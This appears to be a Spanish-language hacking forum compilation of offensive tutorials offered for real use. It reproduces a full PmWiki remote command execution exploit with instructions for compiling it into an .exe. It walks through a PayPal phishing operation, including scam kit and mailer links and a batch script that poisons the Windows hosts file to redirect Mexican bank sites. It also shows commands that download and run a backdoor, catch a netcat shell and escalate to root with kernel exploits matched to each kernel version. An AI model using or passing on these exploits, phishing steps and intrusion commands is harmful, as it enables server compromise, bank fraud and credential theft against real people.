*Los exploits php se distinguen de esta manera #!/usr/bin/php

*Nesecitamos un compilador (BamCompile)

Antes que nada nos descargamos el BamCompile, lo descomprimimos, lo instalamos en mi caso lo instale en C://

Posteriormente usamos un exploit yo usare de ejemplo este:

#!/usr/bin/php -q -d short_open_tag=on
<?
print_r(’
——————————————————————————–
PmWiki <= 2.1.19 Zend_Hash_Del_Key_Or_Index/remote commands execution exploit
by rgod rgod @autistici.org
site: http://retrogod.altervista.org
dork: inurl:pmwiki.php +”Page last modified on” | PmWikiPhilosophy
——————————————————————————–
‘);
/*
works with register_globals=On
against PHP < 4.4.3, 5 <= PHP < 5.1.4
*/
if ($argc<5) {
print_r(’
——————————————————————————–
Usage: php ‘.$argv[0].’ host path http_loc cmd OPTIONS
host:      target server (ip/hostname)
path:      path to pmwiki
http_loc:  an http site with the code to include (without ending slash)
cmd:       a shell command
Options:
-p[port]:    specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php ‘.$argv[0].’ localhost /pmwiki/ http://somehost.com ls -la -P1.1.1.1:80
php ‘.$argv[0].’ localhost /pmwiki/ http://somehost.com ls -la -p81

Note:
prepare this code in http://somehost.com/scripts/stdconfig.php/index.html :
<?php
error_reporting(0);set_time_limit(0);echo “my_delim”;
passthru($_SERVER[”HTTP_CLIENT_IP”]);die;
?>
——————————————————————————–
‘);
die;
}

error_reporting(0);
ini_set(”max_execution_time”,0);
ini_set(”default_socket_timeout”,5);

function quick_dump($string)
{
$result=”;$exa=”;$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=”  .”;}
else
{$result.=”  “.$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=” “.dechex(ord($string[$i]));}
else
{$exa.=” 0″.dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.=”\r\n”; $exa.=”\r\n”;}
}
return $exa.”\r\n”.$result;
}
$proxy_regex = ‘(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)’;
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy==”) {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo ‘No response from ‘.$host.’:’.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo ‘Not a valid proxy…’;die;
}
$parts=explode(’:',$proxy);
echo “Connecting to “.$parts[0].”:”.$parts[1].” proxy…\r\n”;
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo ‘No response from proxy…’;die;
}
}
fputs($ock,$packet);
if ($proxy==”) {
$html=”;
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html=”;
while ((!feof($ock)) or (!eregi(chr(0×0d).chr(0×0a).chr(0×0d).chr(0×0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo “\r\n”.$html;
}

$host=$argv[1];
$path=$argv[2];
$http_loc=$argv[3];
$cmd=”";
$port=80;
$proxy=”";

for ($i=4; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>”-p”) and ($temp<>”-P”)) {$cmd.=” “.$argv[$i];}
if ($temp==”-p”)
{
$port=str_replace(”-p”,”",$argv[$i]);
}
if ($temp==”-P”)
{
$proxy=str_replace(”-P”,”",$argv[$i]);
}
}
if (($path[0]<>’/') or ($path[strlen($path)-1]<>’/')) {echo ‘Error… check the path!’; die;}
if ($proxy==”) {$p=$path;} else {$p=’http://’.$host.’:’.$port.$path;}

$data =”—————————–7d529a1d23092a\r\n”;
$data.=”Content-Disposition: form-data; name=\”FarmD\”;\r\n\r\n”;
$data.=”$http_loc\r\n”;
$data.=”—————————–7d529a1d23092a\r\n”;
$data.=”Content-Disposition: form-data; name=\”-1778478215\”;\r\n\r\n”;
$data.=”1\r\n”;
$data.=”—————————–7d529a1d23092a\r\n”;
$data.=”Content-Disposition: form-data; name=\”-1304181425\”;\r\n\r\n”;
$data.=”1\r\n”;
$data.=”—————————–7d529a1d23092a–\r\n”;
$packet =”POST “.$p.”pmwiki.php?n=PmWiki.BasicEditing?action=edit HTTP/1.0\r\n”;
$packet.=”CLIENT-IP: “.$cmd.”\r\n”;
$packet.=”Content-Type: multipart/form-data; boundary=—————————7d529a1d23092a\r\n”;
$packet.=”Content-Length: “.strlen($data).”\r\n”;
$packet.=”Host: “.$host.”\r\n”;
$packet.=”Connection: Close\r\n\r\n”;
$packet.=$data;
sendpacketii($packet);
if (strstr($html,”my_delim”)){
echo “exploit succeeded…\n”;$temp=explode(”my_delim”,$html);die($temp[1]);
}
elseif (strstr($html,”failed to open stream”))
{echo “*** adjust path… ***\n”;die($html);}
else
{echo “exploit failed…”;}
?>

El codigo que les acabo de dejar lo copiamos en el bloc de notas y lo guardamos con una extension .php

Ahora lo compilamos: tenemos que teclear:

bamcompile exploit.php exploit.exe

siendo exploit.php el codigo que les acabo de dejar,

Ahora nos damos cuenta que se ha creado un archivo llamado exploit.exe que se encuentra en la bamcompile1.21

Le damos doble click al archivo exploit.exe y listo ahi vienen las instrucciones de como usarlo

SaLuDoS

St4t1k

Material:
Scam
Hacked Host
Mail list
Mailer Inbox

Primero hacemos el scam de alguna web .. aqui se los dejo es de paypal
http://rapidshare.com/files/88997799/Scam_PayPal_2008.zip.html

Lo descomprimimos, lo submos a algun hacked host o algun host que tengamos y cuando lo tenemos montado lo probamos y nos dedicamos a buscar cuentas de correo para mandarles el scam, pueden buscar con algun extractor de mails correos , pero como
siempre estan quemados y es posible que algunos no funcionen, lo mas conveniente es decirle a algun wey que se dedique a esto a que te haga el paro y te venda algun mail list para paypal (podria ser de cualquier cosa, banamex, hi5, etc ) si no buquen
por la red hay bastantes, yo les recomiendo el elite extractor, o el tarantula..

Bien ya que tenemos un mail list, conseguimos algun mailer inbox, aqui les dejo la descarga de uno
http://rapidshare.com/files/76390702/mailerpriv8.php

Lo subimos a algun hacked host, no recomiendo host gratuito porque no los envia, ya teniendolo buscamos la letter del scam
(que es lo que se escribe para engañar a la victima)
y si tenemos una letter para pharming nos dedicamos a crear uno

Antes de seguir, el pharming es un metedo que consiste en manipular las dns que usa la victima haciendole creer que entra a una web pero en realidad esta en otra (por ejemplo en el scam)

Ejemplo en batch

@echo off
echo ipdetuhost www.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo ipdetuhost www.bbva.com >> %windir%\system32\drivers\etc\hosts
echo ipdetuhost www.bancomer.com.mx >> %windir%\system32\drivers\etc\hosts
echo ipdetuhost www.esmas.com >> %windir%\system32\drivers\etc\hosts
echo ipdetuhost www.hotmail.com >> %windir%\system32\drivers\etc\hosts
exit

Como veran de esta manera cuando la victima ejecute este archivo y entre a banamex, bbva, bancomer desde el explorador sera redirigido a ipdetuhost y de esta manera el usuario no se va a dar cuenta que realmente esta en una web fake

Solo es teoria en general pero poco a poco AHhahAH

–StATiK–

nos fijamos que carpetas tienen permisos (casi siempre es en tmp)

find -perm 777

ya que nos encontramos en la carpeta vulnerable hacemos esto

cd /tmp

ahora estamos en /tmp bien, tenemos permisos para descargar cosas y ejecutarlas , nos disponemos a hacerlo

cd /tmp;wget web/backdoor/5553; chmod 777 5553; ./5553

Lo que hicimos fue, descargarlo (wget) darle permisos al archivo (chmod 777) y ejecutarlo (./5553), ahora esta trabajando sobre el puerto 5553

ahora nos abrimos el netcat,y de esta maneraestamos diciendole al netcat que se ponga a la escucha del puerto 5553 y que nos devuelva la shell

-vv -l -p 5553

nc
Cmd line: -vv -l -p 5553
listening on [any] 5553 …

Ya que nos devuelve la shell, nos fijamos que kernel lleva

uname -a;pwd;id

sabiendo su version sabras que r00t exploit usar, les dejo la lista para cada una…

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

ya sabiendo que exploit usar, hacemos casi lo mismo que con el backdoor, lo descargamos,

wget laweb.com/exploit/kmod

Connecting to laweb.com:80… connected!
HTTP request sent, awaiting response… 200 OK
Length: 14,860 [text/plain]

0K ………. …. 100% @ 70.79 KB/s

23:26:39 (70.45 KB/s) - `kmod’ saved [14860/14860]

, se sube, y ahora viene lo bueno le damos permisos y lo ejecutamos

chmod 777 kmod; ./kmod

si nos fue bien saldra algo como esto

chmod 777 kmod; ./kmod
[+] Attached to 30330
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0×40011aed
[+] Now wait for suid shell…
sh-2.05#
sh-2.05# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys)

4(adm),6(disk),10(wheel)

y bueno ahora somos r00t, ya sabran ustedes que hacer, en la proxima entrega les dire como hacer mass deface

SaLuDoS

cd C:PerlBin

El perl, lo instale en esa carpeta, si lo instalaste en otra solo es cuestion de cambiarla de directorio con el comando cd, de esta manera nos devuelve algo asi:

C:PerlBin>

Ahora nos toca interpretar el exploit, y nos vamos a su carpeta con el cd.

perl C:Exploitsexploit.pl

Y obtendremos algo como esto:

Microsoft Windows XP [Versión 5.1.2600
(C) Copyright 1985-2001 Microsoft Corp.

C:Documents and SettingsAdministrador>cd C:PerlBin

C:perlbin>perl C:cygwinexploitshola.pl

***************************************************
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy <optional>]
i.e. perl nenu.pl www.site.com /forum/BigAdmin 127.0.0.1:3128
****************************************************

Nos dice claramente como usar el exploit, ya es de cada uno como los explota

Texto escrito por: ansatsu